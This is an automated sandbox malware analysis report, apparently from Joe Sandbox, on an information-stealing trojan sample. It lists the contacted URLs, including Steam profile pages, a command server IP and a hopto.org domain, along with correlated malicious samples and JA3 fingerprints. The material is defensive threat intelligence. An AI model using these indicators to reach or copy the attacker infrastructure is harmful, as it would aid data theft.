                                                                                                                          		unknown
                                                                                                                          https://broadcast.st.dl.eccdnx.comaZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                            		unknown
                                                                                                                            https://store.steampowered.com/steam_refunds/aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                              		unknown
                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                		unknown
                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.paZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                  		unknown
                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=nBdvNPPzc0qI&aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                    		unknown
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                      		unknown
                                                                                                                                      https://steamcommunity.com/workshop/aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                        		unknown
                                                                                                                                        https://login.steampowered.com/aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://65.109.142.154/CaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://community.caZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                              		unknown
                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199786602107[1].htm.0.drfalse
                                                                                                                                                		unknown
                                                                                                                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://cowod.hopto.org/aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003B3D000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://recaptcha.netaZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://steamcommunity.com/profiles/76561199786602107vR.aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://store.steampowered.com/76561199786602107[1].htm.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://127.0.0.1:27060aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://cowod.oudflareaZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://steamcommunity.com/profiles/76561199786602107/badgesaZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199786602107[1].htm.0.drfalse
                                                                                                                                                                  		unknown

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  104.102.49.254
                                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                                  		16625AKAMAI-ASUStrue
                                                                                                                                                                  65.109.142.154
                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                  		11022ALABANZA-BALTUSfalse
                                                                                                                                                                  149.154.167.99
                                                                                                                                                                  		t.meUnited Kingdom
                                                                                                                                                                  		62041TELEGRAMRUfalse

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1538067
                                                                                                                                                                  Start date and time:2024-10-20 08:34:06 +02:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 4m 53s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:aZm1EZ2IYr.exe
                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                  Original Sample Name:1e1d5412616216fd90ea3cb6a87353db.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/11@3/3
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  • Number of executed functions: 47
                                                                                                                                                                  • Number of non-executed functions: 102
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  02:35:26API Interceptor1x Sleep call for process: aZm1EZ2IYr.exe modified
                                                                                                                                                                  02:35:34API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • www.valvesoftware.com/legal.htm
                                                                                                                                                                  65.109.142.154Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/img/favicon.ico
                                                                                                                                                                      http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/?setln=pl
                                                                                                                                                                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.org/
                                                                                                                                                                      http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • telegram.dog/
                                                                                                                                                                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                      • t.me/cinoshibot
                                                                                                                                                                      jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                      • t.me/cinoshibot

                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      t.meUnlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      SecuriteInfo.com.Win32.DropperX-gen.7855.32539.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      https://njanimallaw.com/divorce-family-law/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 162.241.217.237
                                                                                                                                                                      https://linkifly.net/TRACKINGGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 50.6.153.232
                                                                                                                                                                      https://hwu.iaa.mybluehost.me/vvvop/SEEKKK/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 50.6.153.232
                                                                                                                                                                      nvANxkZUSC.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 194.120.230.54
                                                                                                                                                                      http://7xv6.mjt.lu/lnk/AXMAAFFvlI0AAAAAAAAAA8Ye8moAAABKhgwAAAAAAAq7pgBnByOSeYt8cGpTTPaPBTAKJeV-UQAKnpI/1/EWmySlSHcyP6g54g0SDc-g/aHR0cHM6Ly9zbmlwLmx5L2V6NGxydwGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 50.6.153.26
                                                                                                                                                                      steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254

                                                                                                                                                                      ASNs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      TELEGRAMRUUnlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      routcrying.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      mnobizx.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      SecuriteInfo.com.Win32.DropperX-gen.7855.32539.exeGet hashmaliciousXehook StealerBrowse
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      rcota____oRFQNO-N__merodopedido106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      SecuriteInfo.com.Win64.Malware-gen.32485.11504.exeGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Wuerth_factura_4052073226..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      KIDy5J5su4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      ALABANZA-BALTUSUnlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      y45bCpZY1I.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.241.236
                                                                                                                                                                      xy894fdlWJ.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.241.236
                                                                                                                                                                      yakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 64.176.208.213
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.241.236
                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 65.109.241.236
                                                                                                                                                                      PURCHASE_ORDER.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                                                                      • 64.176.178.205
                                                                                                                                                                      http://nndpdnm.3utilities.com/#bd5on/p8la73b/LoiU9/1oQd1tRDE-SUREIDANt92YuMXZpJHZuV3bmxWYi9GbnBUY5hGZhBHc15Cdp1WYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 65.108.133.178
                                                                                                                                                                      ZRemI0ixC6.dllGet hashmaliciousBumbleBeeBrowse
                                                                                                                                                                      • 65.108.214.195
                                                                                                                                                                      AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.102.49.254

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      51c64c77e60f3980eea90869b68c58a8Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      y45bCpZY1I.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      xy894fdlWJ.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      EP2E1yYJyT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      9evHLnwull.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      tiCW7a3x1P.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      SecuriteInfo.com.FileRepMalware.4445.21502.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      EL7ggW7AdA.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      y45bCpZY1I.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      xy894fdlWJ.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.14702.4787.exeGet hashmaliciousKoiLoaderBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                      Megrendel#U00e9s 202401378.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                      • 149.154.167.99

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aZm1EZ2IYr.exe_b472e834091e64353d02c5689452117e2161926_ac611e5f_7d43e3d9-5d04-4320-91f6-e292046f10e0\Report.wer

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.1603036054723175
                                                                                                                                                                      Encrypted:false
